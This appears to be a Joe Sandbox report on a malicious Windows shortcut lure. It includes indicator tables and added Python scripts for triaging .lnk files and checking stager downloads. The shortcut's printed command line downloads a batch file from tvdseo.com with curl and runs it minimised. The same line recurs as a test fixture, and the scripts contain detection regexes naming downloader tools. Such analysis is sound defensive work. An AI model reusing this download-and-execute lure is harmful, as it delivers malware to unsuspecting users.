https://tvdseo.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=325ad20e90dbc8889310 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/dich-vu-seo-youtube/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/js/kk-star-ratings.min.js?ver= | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.19.4 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2411 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/category/tin-hoc-ab/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/dich-vu-seo-shop-tmdt/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/file/quan.bate | curl.exe, 00000002.00000002.1293075206.0000000003628000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.19.4) | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=9. | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-510x213.png | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/css/kk-star-ratings.min.css?ve | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-192x192.png | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=6.0 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/xmlrpc.php | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://images.dmca.com/badges/dmca.css?ID=502286c4-db26-4ff5-898e-3899d9fd8507 | UDkXtQleTB.bat.2.dr | false | | high
https://www.dmca.com/Protection/Status.aspx?id=502286c4-db26-4ff5-898e-3899d9fd8507&amp;refurl=https | UDkXtQleTB.bat.2.dr | false | | high
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.19.4) | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.19.4) | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/themes/flatsome/assets/js/tvdseo.js | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/themes/flatsome/assets/js/flatsome.js?ver=8e60d746741250b4dd4e | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-sear | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/xmlrpc.php?rsd | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://yoast.com/wordpress/plugins/seo/ | UDkXtQleTB.bat.2.dr | false | | high
https://tvdseo.com/iq-vo-cuc/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/wp-consent-api-integration.min. | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-180x180.png | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://gmpg.org/xfn/11 | UDkXtQleTB.bat.2.dr | false | | high
https://congdonginan.vn/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: safe | unknown
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.19.4); | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/#website | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/dich-vu-seo-instagram/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/dich-vu-seo-facebook/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/uploads/2022/01/LOGO_TVD_SEO_VUONG-removebg.png | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/category/thongtinhay/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-consent-mode-3d64 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=9.4.1 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/dich-vu-seo-fanpage/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/my-account-2/ | curl.exe, 00000002.00000003.1292643132.000000000363C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292615927.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292409522.0000000003693000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000002.00000003.1292314128.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://www.google.com/maps/embed?pb= | UDkXtQleTB.bat.2.dr | false | | high
https://tvdseo.com/wp-content/plugins/wp-consent-api/assets/js/wp-consent-api.min.js?ver=1.0.7 | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/dich-vu-seo-google-map/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://api.w.org/ | UDkXtQleTB.bat.2.dr | false | | high
https://tvdseo.com/#/schema/logo/image/ | UDkXtQleTB.bat.2.dr | false | Avira URL Cloud: phishing | unknown
https://tvdseo.com/dich-vu-seo-shop-shoppe/ | UDkXtQleTB.bat.2.dr | false | |
                          • Avira URL Cloud: phishing
                          unknown
                          https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.UDkXtQleTB.bat.2.drfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://www.youtube.com/channel/UCUZToD8MAs4MWywND_9DStgUDkXtQleTB.bat.2.drfalse
                            high
                            https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Regular.ttfUDkXtQleTB.bat.2.drfalse
                            • Avira URL Cloud: phishing
                            unknown
                            https://tvdseo.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0UDkXtQleTB.bat.2.drfalse
                            • Avira URL Cloud: phishing
                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.81.137 | tvdseo.com | United States | 13335 | CLOUDFLARENETUS | false
                            IP
                            127.0.0.1
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1562561
                            Start date and time:2024-11-25 18:00:28 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 58s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:17
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:document.lnk.download.lnk
                            Detection:MAL
                            Classification:mal72.winLNK@7/1@1/2
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .lnk
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: document.lnk.download.lnk
                            No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.81.137 | Compilazione di video e immagini protetti da copyright.bat | malicious | Unknown | -
104.21.81.137 | ZkHGQqVNJE.bin | malicious | Unknown | -
Match | Associated Sample Name / URL | Detection | Threat Name | Context
tvdseo.com | Compilazione di video e immagini protetti da copyright.bat | malicious | Unknown | 104.21.81.137
tvdseo.com | http://tvdseo.com | malicious | Unknown | 86.38.202.97
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | http://www.urbanerecycling.com | malicious | HTMLPhisher, TechSupportScam | 104.17.25.14
CLOUDFLARENETUS | https://clickme.thryv.com/ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjrrUNll1a6cdLHKylkZo7LdScnRC-2F7iC6hnMEdduqsWXASxbd-2BZeaoWZvCDaIudlukgt9S3uZsKQeBP86XSjGCyt8CMjRvxL6j1Dyr0eym46qao7knFO6iIo9LZAeoxbyu5E6pzhyc9-2F2VP-2BlZM3Ea-2B-2FiBNpyPNxcoMEQ2om5Ig-2F7RZ8WTAt-2F5MxtsslPlJve5tzpsISP74pi-2B8USUpl-2BAaEmzHGUoeKWRMyxJH35FiSw-3D-3D | malicious | Unknown | 104.21.55.245
CLOUDFLARENETUS | Encrypt DOC2024.11.19.1983928 shared with you! (203 KB).msg | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | AccountDocuments - christinal.docx | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://ymcajeffco-my.sharepoint.com/:u:/g/personal/rcampbell_mtvernonymca_org/Eb_PxgSrk7VCrlppYfmkXowB9vCdCR2cgdVG8AQkH7BcbQ?e=b9efJ2 | malicious | HTMLPhisher | 1.1.1.1
CLOUDFLARENETUS | Compilazione di video e immagini protetti da copyright.bat | malicious | Unknown | 104.21.81.137
CLOUDFLARENETUS | file.exe | malicious | Unknown | 172.67.187.240
CLOUDFLARENETUS | https://protection.cloze.email/r/EKJc7NAc1aGPd0140vt6MnJzYkpI4pQCyldpUEBtdFT8T8dhNmmHodcXxvKddJW4AhfqaDIQj32BX0HxSGbmPeDqDQs/n/SlBNQ05FV1NMRVRURVI/y52l9ppb.r.ap-northeast-1.awstrack.me/L0/https:%2F%2Fcloudprotectionc5f91e84a2b3d9e748f2a1d9b7e5f0c4a2b3d9e7a5pages.dynamixs.workers.dev%2F/1/010601933048cf65-492c630f-d6b3-471e-a31f-bf186231f1e8-000000/SL9CcqykWh2mQIC7eGiOMwzMSpk=185 | malicious | Unknown | 104.21.29.43
CLOUDFLARENETUS | http://ti-17-0.914trk.com | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://www.google.com/url?q=https://clickme.thryv.com/ls/click?upn%3Du001.3HlspJ5fg-2BP4CQkV7GSVhvWTpgC6w0k7sA8b2Z9JBYU9BEMXtqHWLHW9PPcpforJszQ3_jzclrAiO28PBUU1ZLf2yC1YJEF5Rt8zDnz4yKbEuFqXf3c0fVOhzL2fXxOYix3CjCrzlLwoIPSXb9PavK50mtpdK-2FWF7thydb3q6E5ptEQiOVUz527Ewi1t813S-2FHejAJLe09fD2VqgM8mtwuQZA9i83VLkCPF4iItCSPXKUpNgWQKWxjEO6jlBp5GYVLghrpKcDuea5GONmLMVlbh4fQe7dtjhTFxxxExxfN1kv5tnx1PPl9DjYIyE468wz1qa1Z-2FWJgZrJbIFEpqhd4o5tGGyUoiPcIot5l2j9dpjy7QKj99ZiCz-2BBLi5dHUIl8gC4RxZBl-2FMaH4IZlQyWpqM-2BtZ9uE3ezFUl2fORMwAp4lQk-3D%23Cjanetrosenbach@imageindustries.com&source=gmail-imap&ust=1733149343000000&usg=AOvVaw1uIAp-JnZbTlkY9Td9ZLJj | malicious | HTMLPhisher | 172.67.166.17
Match | Associated Sample Name / URL | Detection | Threat Name | Context
74954a0c86284d0d6e1c4efefe92b521 | ZOL2mIYAUH.exe | malicious | Phemedrone Stealer, PureLog Stealer, XWorm, zgRAT | 104.21.81.137
74954a0c86284d0d6e1c4efefe92b521 | 18sFhgSyVK.exe | malicious | XWorm | 104.21.81.137
74954a0c86284d0d6e1c4efefe92b521 | KEFttAEb.vbs | malicious | PureCrypter | 104.21.81.137
74954a0c86284d0d6e1c4efefe92b521 | hkQx7f6zzw.exe | malicious | TVrat | 104.21.81.137
74954a0c86284d0d6e1c4efefe92b521 | hkQx7f6zzw.exe | malicious | TVrat | 104.21.81.137
74954a0c86284d0d6e1c4efefe92b521 | reservation .exe | malicious | TVrat | 104.21.81.137
74954a0c86284d0d6e1c4efefe92b521 | oZ3vtWXObB.exe | malicious | TVrat | 104.21.81.137
74954a0c86284d0d6e1c4efefe92b521 | aeyh21MAtA.exe | malicious | TVrat | 104.21.81.137
74954a0c86284d0d6e1c4efefe92b521 | wjpP1EOX0L.exe | malicious | TVrat | 104.21.81.137
74954a0c86284d0d6e1c4efefe92b521 | PkWnPA8l7C.exe | malicious | DBatLoader, TVrat | 104.21.81.137
No context
                                Process:C:\Windows\SysWOW64\curl.exe
                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (4512), with CRLF, LF line terminators
                                Category:dropped
                                Size (bytes):104100
                                Entropy (8bit):5.6234075761484945
                                Encrypted:false
                                SSDEEP:3072:rO8dklCv0QCInTQDdoOkbd5t7UNlwtQeX1C+FSgqGRdPUVtSS0:pCW0QdTK+S0
                                MD5:CF1E01C2482E0F6C4097B3EF9B733A94
                                SHA1:9D40A38FA06C7EA27E42CC00698E4ADD387FAAE0
                                SHA-256:C63B7D6EF4D4561CD8CCC97A014A69C905FDECFF67DBB4E5CE1BB0F55B1EE8B7
                                SHA-512:85233DFE03EA259C17D5CCB90A02BD856DB5380341AD5E9063FFCF05A00D83063687B35CA44399DCD57298673CFA03B0541D336A6D809CCD639534797DF3199D
                                Malicious:true
                                Reputation:low
                                Preview:<!DOCTYPE html>.<html lang="vi" class="loading-site no-js">.<head>..<meta charset="UTF-8" />..<link rel="profile" href="https://gmpg.org/xfn/11" />..<link rel="pingback" href="https://tvdseo.com/xmlrpc.php" />...<script>(function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);</script>.<meta name='robots' content='noindex, follow' />.<meta name="viewport" content="width=device-width, initial-scale=1" /> Ch. .. ..ng . Google tag (gtag.js) dataLayer ...c th.m b.i Site Kit -->.<script id='google_gtagjs-js-consent-mode-data-layer'>.window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}.gtag('consent', 'default', {"ad_personalization":"denied","ad_storage":"denied","ad_user_data":"denied","analytics_storage":"denied","functionality_storage":"denied","security_storage":"denied","personalization_storage":"denied","region":["AT","BE","BG","CH","CY","CZ","DE","DK","EE","ES","FI","FR","GB","GR","HR","
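The dropped file is not the batch script the shortcut asked for. Its type is HTML document, its preview is the tvdseo.com WordPress front page, and the HTTP session later in this report shows the server answering GET /file/quan.bat with 404 Not Found: the second stage had already been removed when the analysis ran. curl was invoked with -s -o but without -f/--fail, so it wrote the error body to C:\Users\Public\UDkXtQleTB.bat, and the shortcut's start /min then launched that HTML as a batch file. This also explains the URL list earlier in the report: every entry sourced from UDkXtQleTB.bat.2.dr is a theme, plugin or font asset scraped from that 404 page. The Python below is an added check for exactly this situation, written for this page and not part of Joe Sandbox or the sample: given the HTTP status and the saved bytes it decides whether a stager really retrieved its payload, classifies the body as HTML or batch, and lists the embedded URLs so they can be separated from real indicators. The two sample inputs are constructed (the HTML mirrors the preview above; the batch file is a benign stand-in), and the marker lists are heuristics assumed by the example.

```python
import re
from typing import Dict, List, Optional

# Constructed stand-in for the first bytes of the dropped UDkXtQleTB.bat, mirroring the
# report's preview; this is not the real file content.
SAMPLE_STATUS = 404
SAMPLE_BODY = (
    b'<!DOCTYPE html>\n<html lang="vi" class="loading-site no-js">\n<head>\n'
    b'\t<meta charset="UTF-8" />\n'
    b'\t<link rel="profile" href="https://gmpg.org/xfn/11" />\n'
    b'\t<link rel="pingback" href="https://tvdseo.com/xmlrpc.php" />\n'
    b'\t<script src="https://tvdseo.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1"></script>\n'
)
# Constructed benign batch file, to show what a successfully fetched stage classifies as.
SAMPLE_BATCH = b"@echo off\r\nset STAGE=2\r\necho %STAGE%\r\n"

# Heuristic markers (assumed for this example, not a Joe Sandbox rule).
HTML_MARKERS = (b"<!doctype html", b"<html", b"<head>", b"<meta ", b"<script")
BATCH_STARTS = ("@echo", "echo ", "set ", "rem ", "::", "cmd", "powershell", "start ", "call ", ":")
ATTR_URL_RE = re.compile(rb"""(?:href|src)\s*=\s*["']([^"'\s]+)["']""", re.I)


def sniff_kind(body: bytes) -> str:
    """Classify the saved bytes as 'html', 'batch' or 'unknown' from their first lines."""
    head = body.lstrip()[:512].lower()
    if any(marker in head for marker in HTML_MARKERS):
        return "html"
    lines = [ln.strip().lower() for ln in body[:4096].decode("latin-1").splitlines()]
    lines = [ln for ln in lines if ln][:5]
    if lines and all(ln.startswith(BATCH_STARTS) for ln in lines):
        return "batch"
    return "unknown"


def extract_urls(body: bytes) -> List[str]:
    """URLs referenced by href/src attributes; for an error page these are the site's own assets."""
    return sorted({m.decode("latin-1") for m in ATTR_URL_RE.findall(body)})


def assess_stage(status: Optional[int], body: bytes, expected: str = "batch") -> Dict[str, object]:
    """Did the stager get its payload, or did curl -o (without --fail) save an error page under the .bat name?"""
    kind = sniff_kind(body)
    http_ok = status is None or status < 400
    retrieved = http_ok and kind == expected
    if not http_ok:
        note = f"HTTP {status}: curl -o without --fail writes the error body to disk; the saved file is the server's error page"
    elif kind != expected:
        note = f"body classified as {kind}, expected {expected}"
    else:
        note = "payload retrieved; analyse the saved file as the next stage"
    return {
        "status": status,
        "kind": kind,
        "stage_retrieved": retrieved,
        "embedded_urls": extract_urls(body),
        "note": note,
    }


if __name__ == "__main__":
    import json
    import sys
    body = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BODY
    status = int(sys.argv[2]) if len(sys.argv) > 2 else SAMPLE_STATUS
    print(json.dumps(assess_stage(status, body), indent=2))
```

Run it as `python stage_check.py UDkXtQleTB.bat 404` against the dropped file and the status from the HTTP session; a `stage_retrieved` of false means the sandbox never saw the real second stage, and the "malicious: true" verdict on the dropped file rests on the shortcut's behaviour, not on the file's content.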
                                File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Sun Nov 19 08:21:59 2023, mtime=Tue Oct 1 09:54:59 2024, atime=Sun Nov 19 08:21:59 2023, length=236544, window=hidenormalshowminimized
                                Entropy (8bit):3.55363835241176
                                TrID:
                                • Windows Shortcut (20020/1) 100.00%
                                File name:document.lnk.download.lnk
                                File size:2'037 bytes
                                MD5:504d8898a97dda2963425df8c5a04118
                                SHA1:0554cf0e2137e4a925e9137b9330491361c77011
                                SHA256:7a1d5aa394c347ff8606fa04a44cc507fab103c8167e52310ec683dbb005b4fd
                                SHA512:94698a9adbcdca70ad7b51d7446dd34b5c2256addae266ddae4d1dfccbf86ba5d4268213441820b7b56a7cf92db20430761a8892af620640522f84c0628d1bfe
                                SSDEEP:24:8WSJfdJzitaIGO2uz+seAS7jFyVgS7VddNXuHYocLbAXTp4P65mf:8WIbgQOFeNFcrdLXuHULkX14mE
                                TLSH:1F4132160BE91B15F3F71C7868F71350863B7A0BEE109B0D019502484813A21DE68F7B
                                File Content Preview:L..................F.@.. .....4.....n..\.....$6.............................5....P.O. .:i.....+00.../C:\...................V.1.....6YZY..Windows.@........V..AYDm..............................W.i.n.d.o.w.s.....Z.1......X.|..SysWOW64..B........V..AYDm......
                                Icon Hash:74f4f4dcece9e9ed

                                General

                                Relative Path:..\..\..\Windows\SysWOW64\cmd.exe
                                Command Line Argument:/c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
                                Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
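The three General fields above are what make this shortcut a lure: a relative path that resolves to cmd.exe, an argument string that downloads with curl and launches the result with start /min, and an Edge icon so the file looks like a saved web document. The static line "window=hidenormalshowminimized" is file(1) rendering ShowCommand value 7 (SW_SHOWMINNOACTIVE) bit by bit, so the console opens minimised. The Python below is an added example for this page, not code from Joe Sandbox or from the sample, that pulls those fields straight out of the Shell Link binary format: the 76-byte header, the optional LinkTargetIDList and LinkInfo skipped by their size fields, then the StringData items in the order the format fixes them. It then scores the effective command line. The indicator patterns and the URL regex are heuristics assumed by the example; the sample bytes are constructed from the values printed above rather than taken from the submitted file.

```python
import re
import struct
from dataclasses import dataclass
from typing import Dict, Optional

# Shell Link header constants (MS-SHLLINK, section 2.1).
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which structures follow the header.
HAS_LINK_TARGET_IDLIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# ShowCommand values the format defines; Windows treats anything else as SW_SHOWNORMAL.
SW_SHOWNORMAL, SW_SHOWMAXIMIZED, SW_SHOWMINNOACTIVE = 1, 3, 7

# Download-and-execute indicators: an assumption of this example, not a sandbox rule.
INDICATORS = {
    "downloader": re.compile(r"\b(curl|certutil|bitsadmin|wget|powershell|mshta)\b", re.I),
    "cmd_/c": re.compile(r"\bcmd(\.exe)?\b.*\s/[ck]\b", re.I),
    "start_min": re.compile(r"\bstart\s+/min\b", re.I),
    "public_dir": re.compile(r"\\Users\\Public\\", re.I),
}
URL_RE = re.compile(r"""https?://[^\s"'&|<>]+""")


@dataclass
class ShellLink:
    flags: int
    show_command: int
    name: Optional[str] = None
    relative_path: Optional[str] = None
    working_dir: Optional[str] = None
    arguments: Optional[str] = None
    icon_location: Optional[str] = None


def _string_data(buf: bytes, off: int, unicode: bool):
    """StringData item: CountCharacters (u16) then that many characters, no terminator."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    width = 2 if unicode else 1
    raw = buf[off:off + count * width]
    if len(raw) != count * width:
        raise ValueError("truncated StringData")
    text = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")
    return text, off + count * width


def parse_lnk(buf: bytes) -> ShellLink:
    """Parse header, skip IDList/LinkInfo by their size fields, read the StringData items."""
    if len(buf) < HEADER_SIZE or struct.unpack_from("<I", buf, 0)[0] != HEADER_SIZE:
        raise ValueError("bad HeaderSize: not a Shell Link")
    if buf[4:20] != LNK_CLSID:
        raise ValueError("bad LinkCLSID: not a Shell Link")
    (flags,) = struct.unpack_from("<I", buf, 20)
    (show_command,) = struct.unpack_from("<I", buf, 60)
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_IDLIST:        # IDListSize (u16) + IDList
        (size,) = struct.unpack_from("<H", buf, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:                 # LinkInfoSize (u32) covers the whole structure
        (size,) = struct.unpack_from("<I", buf, off)
        off += size
    link = ShellLink(flags=flags, show_command=show_command)
    unicode = bool(flags & IS_UNICODE)
    # StringData items appear in this fixed order, each only if its flag is set.
    for bit, attr in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            value, off = _string_data(buf, off, unicode)
            setattr(link, attr, value)
    return link


def triage(link: ShellLink) -> Dict[str, object]:
    """Join target and arguments into the effective command line and score it."""
    command = f"{link.relative_path or ''} {link.arguments or ''}".strip()
    hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
    urls = URL_RE.findall(command)
    return {
        "command": command,
        "urls": urls,
        "indicators": hits,
        "minimised_no_activate": link.show_command == SW_SHOWMINNOACTIVE,
        "suspicious": "downloader" in hits and bool(urls),
    }


def build_sample_lnk(relative_path: str, arguments: str, icon_location: str,
                     show_command: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Constructed fixture: a minimal Unicode Shell Link with an empty IDList (terminal ID only)."""
    flags = HAS_LINK_TARGET_IDLIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIqqqIiIHHII", HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 13, show_command, 0, 0, 0, 0)
    idlist = struct.pack("<H", 2) + b"\x00\x00"
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (relative_path, arguments, icon_location))
    return header + idlist + strings


# Constructed sample reproducing the General section above (not the submitted file's bytes).
SAMPLE_LNK = build_sample_lnk(
    r"..\..\..\Windows\SysWOW64\cmd.exe",
    r"/c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat",
    r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_LNK
    link = parse_lnk(data)
    print(f"target   : {link.relative_path}")
    print(f"arguments: {link.arguments}")
    print(f"icon     : {link.icon_location}")
    print(triage(link))
```

Running it against a real .lnk (`python lnk_triage.py document.lnk.download.lnk`) gives the same three fields the report prints, without opening the shortcut; the ExtraData blocks after StringData (environment variables, the tracker block with the creator's machine name) are deliberately not parsed here but are the next place to look when attributing a lure.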
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 18:01:24.723707914 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:24.723747969 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:24.723814964 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:24.750706911 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
Nov 25, 2024 18:01:24.750720978 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.087337971 CET | 443 | 49703 | 104.21.81.137 | 192.168.2.7
Nov 25, 2024 18:01:26.087434053 CET | 49703 | 443 | 192.168.2.7 | 104.21.81.137
